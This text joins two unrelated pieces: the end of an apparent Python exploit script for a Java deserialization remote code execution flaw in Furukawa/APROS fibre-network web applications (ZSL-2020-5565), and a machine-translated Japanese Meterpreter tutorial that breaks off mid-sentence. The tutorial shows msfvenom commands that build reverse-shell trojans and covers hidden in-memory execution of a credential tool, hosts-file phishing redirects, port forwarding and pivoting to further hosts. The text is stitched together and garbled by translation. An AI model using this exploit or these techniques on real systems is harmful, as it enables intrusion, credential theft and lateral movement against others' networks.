b"\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00" payload += b"\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E" payload += b"\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00" payload += b"\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09" payload += b"\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00" payload += b"\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"#######" jbits = BytesIO() with gzip.GzipFile(fileobj=jbits, mode="wb") as f: f.write(payload) serialize = base64.b64encode(jbits.getvalue()) print("[*] Sending serialized object") self.headers = { "Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn", "Content-Type" : "application/x-www-form-urlencoded", "User-Agent" : "ISP-Eye/2.51", "Connection" : "keep-alive"} self.paramz={"javax.faces.ViewState" : serialize} #sleep(1) r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz) def par(self): if len(sys.argv) != 4: self.usage() else: self.target = sys.argv[1] self.callback = sys.argv[2] self.lport = int(sys.argv[3]) if not "http" in self.target: self.target = "http://{}".format(self.target) def check(self): print("[*] Setting up valid URL path") try: r = requests.get(self.target) app = r.text if not "FURUKAWA" in app and not "APROS" in app: print("[!] App not detected.") exit(0) if "FURUKAWA" in app: self.path = "/FURUKAWA/" elif "APROS" in app: self.path = "/APROS/" else: exit(-1337) except Exception as p: print("[!] Somethingz wrong: \n--\n{poraka}".format(poraka=p)) exit(0) def framed(self): naslov = """ o===--------------------------------------===o | | | Furukawa Electric / Tecnored | | APROS Evolution | FURUKAWA | ConsciusMAP | | Fiber-To-The-Home (FTTH) | | | | Java Deserialization Remote Code Execution | | ZSL-2020-5565 | | | o===--------------------------------------===o || || (\__/)|| (•ㅅ•)|| / 　 づ| """ print(naslov) def usage(self): self.framed() print("Usage: ./furukawa.py <RHOST[:RPORT]> <LHOST> <LPORT>") print("Example: ./furukawa.py 172.16.0.1:8080 172.16.0.200 4444\n") exit(0) def main(self): self.par()########() self.check()######() self.thricer()####() if __name__ == '__main__': Optics().main()

0x01pirst学習メータープレーター 1.1.メータープレターとは何ですか MeterPreterは、MetaSploitフレームワークの拡張モジュールです。オーバーフローが成功した後、攻撃ペイロードとして使用されます。オーバーフロー攻撃が成功した後、攻撃ペイロードはコントロールチャネルを返します。攻撃のペイロードとして使用すると、ターゲットシステムのメータープレターシェルへのリンクを取得できます。 MeterPreter Shellには、ユーザーの追加、何かの隠れ、ユーザーのパスワードの開き、リモートホストのファイルのアップロードとダウンロード、CMD.exeの実行、画面のキャプチャ、リモートコントロールのキャプチャ、キー情報の取得、キー情報の取得、アプリケーションのクリア、リモートホストのシステム情報の表示などのマシンなどのインターフェースの表示などの表示など、浸透モジュールとして多くの有用な機能があります。リモートホストに身を隠すと、システムハードディスク内のファイルが変更されないため、HIDS [ホストベースの侵入検知システム]が応答することは困難です。 In addition, the system time varies when it is running, so tracking it or terminating it can also become very difficult for an experienced person. 最後に、MeterPreterは複数のセッションを作成するタスクを簡素化することもできます。これらのセッションは、浸透に使用できます。 Metasploitフレームワークでは、MeterPreterは浸透後のツールであり、動作中に動作中に拡張できる動的でスケーラブルなペイロードです。このツールは、「メモリDLLインジェクション」の概念に基づいて実装されています。これにより、ターゲットシステムは、新しいプロセスを作成し、注入されたDLLを呼び出すことにより、注入されたDLLファイルを実行できます。その中で、ターゲットデバイス内の攻撃者とメータープレターとの間の通信は、ステージャーソケットを介して実装されています。浸透後モジュールとしてはメータープレターには多くの種類があり、コマンドはコアコマンドと拡張ライブラリコマンドで構成されており、攻撃方法を大幅に濃縮しています。 MeterPreterを説明する必要がある場合、脆弱性が正常に活用された後、コードの第2フェーズとMeterPreterサーバーDLLが送信されます。したがって、ネットワークの不安定な場合、多くの場合、実行可能なコマンドがないか、セッションの確立とヘルプの実行が欠落していることがわかります。これは、VPNに接続し、イントラネットでPSEXECとBIND_TCPを使用するときにしばしば発生します。 1.2.meterpreterテクノロジーの利点 MetaSploitは、WindowsやLinuxなどのさまざまな主流プラットフォームのメータープレターバージョンを提供し、X86およびX64プラットフォームをサポートしています。さらに、MeterPreterはPHP言語とJava言語に基づいた実装も提供しています。 MeterPreterの作業モードは純粋なメモリであり、利点は起動して隠されていることです。これは、ウイルス対策ソフトウェアで監視することが困難です。ターゲットホストディスクにアクセスする必要はないため、侵入の兆候はありません。上記に加えて、MeterPreterはRuby Scripting Extensionsもサポートしています。したがって、ルビー言語はまだ必要です。 0x02メータープレーターの一般的なリバウンドタイプ 1.Reverse_TCP これはTCPベースのバックリンクリバウンドシェルであり、使用するのが非常に安定しています （1）Linux： 次のコマンドを使用して、Linuxの下でリバウンドシェルトロイの木馬を生成します。 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o shell 上の写真を見ると、TrojanファイルのISShellがディレクトリで正常に生成されていることがわかります。次に、ファイルに実行可能な権限を追加します。次に、MetaSploitを開き、モジュールハンドラーを使用して、ペイロードを設定します。注：ここのペイロードセットは、トロイの木馬を生成するために使用するペイロードと同じでなければなりません。 アドレスとポートを設定すると、リスニングを開始します ここでリバウンドシェルトロイの木馬を実行すると、シェルにリバウンドされたことがわかります。 （2）Windows： msfvenom -p windows/meterpreter/reverse_tcp lhost=[your ip] lport=[port] -f exe -oファイル名を生成する MSFVENOM -P Windows/MeterPreter/Reverse_TCP LHOST=192.168.1.102 LPORT=4444 -F EXE -O SHELL.EXE リバース接続シェルは使用するのが非常に安定しているため、LHOSTを設定する必要があります 2.Reverse_http HTTPメソッドに基づく逆接続は、ネットワーク速度が遅い場合、不安定です。 payload:/windows/meterpreter/reverse_http 3.Reverse_Https HTTPSメソッドに基づく逆接続は、ネットワーク速度が遅い場合、不安定です。 HTTPSがリバウンドする場合は、リスニングポートを443に変更してみてください。 payload:/windows/meterpreter/reverse_https 4.bind_tcp これは、TCPに基づくフォワード接続シェルです。イントラネットがネットワークセグメントを横断しているときに攻撃機に接続できないため、イントラネットでよく使用され、LHOSTの設定を必要としません。 次のコマンドを使用して、トロイの木馬を生成します。 msfvenom -p linux/x86/meterpreter/bind_tcp lport=4444 -f elf -o shell 同じことは、権限で実行され、デモンストレーションはありません。 ここで、設定したIPアドレスとポートはターゲットマシンからのものであることに注意してください。これが私たちがそれをつなぐためにイニシアチブをとるものだからです。 0x03関連ペイロード ペイロードには、リモートシステムで実行する必要がある悪意のあるコードが含まれています。 Metasploitでは、ペイロードはモジュールを悪用するために実行できる特別なモジュールであり、ターゲットシステムのセキュリティの脆弱性を活用して攻撃を実装できます。要するに、このエクスプロイトモジュールはターゲットシステムにアクセスでき、そのコードはターゲットシステムでのペイロードの動作を定義します。 Metasploitには、ペイロードモジュールには3つの主要なタイプがあります。 -シングル - スターガー -ステージ シングルは完全に独立したペイロードであり、システムユーザーの追加やファイルの削除など、calc.exeを実行するのと同じくらい簡単です。シングルのため ペイロードは完全に独立しているため、NetCatのような非メタプロイト処理ツールに捕まることがあります。 Stager Payloadsは、ターゲットユーザーと攻撃者間のネットワーク接続を確立し、追加のコンポーネントまたはアプリケーションをダウンロードする責任があります。一般的なステージャーのペイロードはReverse_TCPです。これにより、ターゲットシステムは攻撃者とのTCP接続を確立できます。別の一般的なタイプはbind_tcpです。これにより、ターゲットシステムはTCPリスナーを有効にし、攻撃者はいつでもターゲットシステムと通信できます。 ステージはステージャーです ペイロードによってダウンロードされたペイロードコンポーネントこのペイロードは、サイズ制限なしでより高度な機能を提供できます。 Metasploitでは、ペイロードの名前と使用される形式でそのタイプを推測できます。 単一ペイロードの形式はターゲット/シングルです ステイガー/ステージペイロード形式は、ターゲット/ステージ/ステイガーです Metasploitで「Payloadsを表示」コマンドを実行すると、利用可能なペイロードのリストが表示されます。 このリストでは、Windows/PowerShell_Bind_TCPは単一のペイロードであり、ステージのペイロードは含まれていません。 Windows/x64/meterpreter/reverse_tcpはステイガーです ペイロード（Reverse_TCP）とステージペイロード（MeterPreter）。 0x04メータープレーターの共通コマンド 1。基本コマンド ヘルプ＃MeterPreterヘルプを確認してください バックグラウンド＃返品、ハングメータープレターの背景 BGKILL＃バックグラウンドメータープレータースクリプトを殺します BGLIST＃は、実行中のすべてのバックグラウンドスクリプトのリストを提供します bgrun＃バックグラウンドスレッドとしてスクリプトを実行します チャンネル＃アクティブチャネルを表示します セッション-i番号＃セッションと対話します。番号はn番目のセッションを意味します。セッション-iを使用して、指定されたシーケンス番号にメータープレターセッションに接続し続けています。 セッション-K番号 #interact with Conversation ＃クローズチャンネルを閉じます 終了＃メータープレターセッションを終了します QUIT＃メータープレターセッションを終了します ID #switchをチャンネルに操作します ＃既存のモジュールを実行します。ここで言いたいのは、走行してタブを2回クリックした後、既存のすべてのスクリプトが一覧表示されるということです。一般的に使用されるものには、Autoroute、Hashdump、arp_scanner、multi_meter_injectなどが含まれます。 IRB＃Rubyスクリプトモードを入力します ＃チャネルのデータを読む ＃write data fort data fo a Channel MeterPreterスクリプトを選択した後、実行およびbgrun＃前景と背景実行 MeterPreterの拡張機能をロードする＃を使用します ＃ロードモジュールをロード/使用します リソース＃既存のRCスクリプトを実行します 2。ファイルシステムコマンド CAT C: \ boot.ini＃ファイルの内容を表示すると、ファイルが存在する必要があります del C: \ boot.ini #delete指定されたファイル upload /root/desktop/netcat.exe c: \＃setup.exeのアップロードなど、ファイルをターゲット所有者にアップロードします c: \\ windows \\ system32 \ nimeia.txt/root/desktop/＃ダウンロード：c: \\ boot.ini/root/またはダウンロードなど、ファイルをマシンにダウンロードしてください c: \\ 'programfiles' \\ tencent \\ qq \\ users \\ 295 ****** 125 \\ msg2.0.db /根/ 編集c: \ boot.ini＃ ファイルを編集します getLWD＃ローカルディレクトリを印刷します getwd＃print作業ディレクトリ LCD＃ローカルディレクトリを変更します LS＃現在のディレクトリのファイルのリストをリストします LPWD＃ローカルディレクトリを印刷します PWD＃出力作業ディレクトリ CD C: \\ #enterディレクトリファイル RMファイル#Deleteファイル MKDIR DIER #Create Directoryの被害者システム RMDIR＃被害者システムに関する配信ディレクトリ dir＃ターゲットホストのファイルとフォルダー情報をリスト MV＃ターゲットホストのファイル名を変更します 検索-D d: \\ www -f web.config #searchファイル、d c: \\ -f*.docなど MeterPreter Search -F AutoExec.BAT #Search FILEのSearch MeterPreter Search -F Sea*.BAT C: \\ XAMP \\ enumdesktops #Number of User Logins （1）ファイルをダウンロードします コマンド「ダウンロード +ファイルパス」を使用して、ターゲットマシンの対応する権限のパスの下にファイルをダウンロードします （2）ファイルをアップロードします 「アップロード」コマンドは、ファイルをターゲットマシンにアップロードすることです。図では、LL.TXTをターゲットマシンのC: \ PP \にアップロードしました。 （3）ファイルを表示します 「Cat Filename」は、現在のディレクトリのファイルコンテンツを表示します。コマンドを入力した後、表示しているファイルのコンテンツを返します。 （4）現在のパスを切り替えて照会します 「PWD」コマンドは、DOSコマンドの下の現在のパスを照会します。 「CD」コマンドは、下の図に示すように、現在のパスを変更できます。CD.は、現在のパスの下の前のディレクトリに切り替えることです。 （5）「sysinfo」コマンド 「sysinfo」コマンドは、リモートホストのシステム情報を表示し、コンピューター、システム情報、構造、言語、その他の情報を表示します。リモートホストのオペレーティングシステムはWindows XP Service Pack 2であり、このシステムには多くの脆弱性があることがわかります。 （6）コマンドを実行します 「実行」コマンドは、ターゲットホストのコマンドを実行します。ここで、「execute -H」がヘルプ情報を表示します。 -fは、実行するコマンドを実行することです。 ターゲットホストでプログラムを実行します。たとえば、現在プロセスをExplorer.exeに注入した後、実行ユーザーはスーパーマネージャー管理者です ターゲットホストでメモ帳プログラムを実行しましょう execute -fnotepad.exe 下の図に示すように、メモ帳プログラムがターゲットホストにすぐに表示されます：これはあまりにも明白です。バックグラウンド実行を非表示にする場合は、パラメーター-Hを追加します execute -h -fnotepad.exe この時点で、ターゲットホストのデスクトップは応答しませんでしたが、MeterPreterセッションでPSコマンドを使用してそれを見ました 別のものを見てください。ターゲットホストでCMD.exeプログラムを実行し、隠された方法でメータープレーターセッションで直接対話します。 注文： execute -h -i -fcmd.exe これは、シェルコマンドを使用するのと同じ効果を達成します もう1つのことは、ターゲットホストのメモリでWCE.EXEやTrojanなどのターゲットホストの攻撃プログラムを直接実行して、ターゲットホストのハードディスクで発見または殺されることを避けるためです。 execute -h -m -d notepad.exe -f wce.exe -a '-owce.txt' -dターゲットホストが実行されたときに表示されるプロセス名（変装のため） -mメモリから直接実行します '-owce.txt'は、wce.exeの実行パラメーターです （7）IDLETIMEコマンド 「idletime」コマンドは、ターゲットマシンが現在の操作なしコマンドに期限切れになった時間を表示します。図のディスプレイは、ターゲットホストが9分19秒前に操作を行うことを意味します。 （8）コマンドを検索します 「検索」コマンドは、ターゲットホストの特定のファイルを検索します。このコマンドは、システム全体または特定のフォルダーを検索できます。 「検索-H」コマンドを使用して、検索コマンドのヘルプ情報を表示します。 以下の図では、「検索–F aa.txt」コマンドは、現在のディレクトリにaa.txtファイルとターゲットマシンの現在のディレクトリのサブディレクトリがあるかどうかを確認します。もしそうなら、それはその道を示します。 「検索-f l*.txt C: \\ pp」は、C: \\ ppのLで始まるすべてのTXTファイルと、PPフォルダーの下のすべてのサブファイルを表示します。そのようなファイルがある場合、パスとサイズを返します。 （9）コマンドを編集します VIエディターに電話して、ターゲットホストのファイルを変更する たとえば、ターゲットホストのホストファイルを変更して、ターゲットホストがBaiduにアクセスするときに準備されたフィッシングWebサイトに移動するようにします（実験目的のみ） ping www.baidu.comターゲットホストでは、出てくるターゲットIPは192.168.1.1ですを変更しました 3。ネットワークコマンド ipconfig/ifconfig＃IPアドレスを含むネットワークインターフェイスに関する重要な情報を表示します portfwd -h 使用法：portfwd [-h] [add | delete | list | flush] [args] オプション： -lローカルホストをオプトして聴く（オプション） -hヘルプバナー -l聴くためにローカルポートを選択します -p OPTはリモートポートに接続します -rリモートホストを選択して接続します portfwd add -l 4444 -P 3389 -R 192.168.1.102＃ポート転送、ローカル監視4444、ターゲットマシン3389をローカル4444に転送 netstat -an | grep "4444 '#view指定されたポートの開口部 rdesktop -U Administrator -P BK＃123 127.0.0.1:444444444444 #use rdesktop desktop、-u username -pパスワードに接続する rdesktop 127.1.1.0:4444 #requiresユーザー名とパスワードをリモートで接続します ルート＃被害者ルーティングテーブルを表示または変更します ルート追加192.168.1.0 255.255.255.0 1 #ADDダイナミックルート ルートプリント#Routingテーブル出力 runget_local_subnets＃ターゲットホストのイントラネットIPセグメントステータス ARP＃ARPバッファーテーブルのルック GetProxy #Get Proxy （1）portfwd ネットワークコマンドリストIP情報（IPConfig）、ルーティングテーブルの変更（ルート）、およびポート転送（PORTFWD）を表示します。たとえば、portfwd： ルールを確立した後、リモート3389ポートが転送されるように、ローカル3344ポートに接続できます。 （2）ルート Routeコマンドを使用して、MeterPreterセッションでイントラネットをさらに貫通します。メータープレターのリバウンドセッションを削除して生成したホストは、イントラネットから外れている可能性があります。外にナットの層があります。イントラネットの他のホストに対する攻撃を直接起動することはできません。次に、生成されたメータープレターセッションをルーティングスプリングボードとして使用して、イントラネットの他のホストを攻撃できます。 最初にrunget_local_subnetsコマンドを使用して、撮影されたターゲットホストのイントラネットIPセグメントを表示できます。 コマンド：get_local_subnetsを実行します 下の図に示すように： そのイントラネットには192.168.249.0/24ネットワークセグメントがありますが、直接アクセスできません。 ルートをしましょう。次のホップは、現在取得したホストのセッション（現在5）です。つまり、249ネットワークセグメントのすべての攻撃トラフィックは、侵入したターゲットホストのメータープレーターセッションに通過します。 コマンド：ルート追加192.168.249.0 255.255.255.0 5 次に、ルートプリントを使用してルーティングテーブルを表示します。効果は次のとおりです。 最後に、このルートを使用して、このルートを介して249ネットワークセグメントのMS08-067の脆弱性を備えた別のホストを攻撃し、下の図に示すように、別のイントラネットホスト192.168.249.1を正常に取得できます。 ほとんどの場合、MeterPRを取得します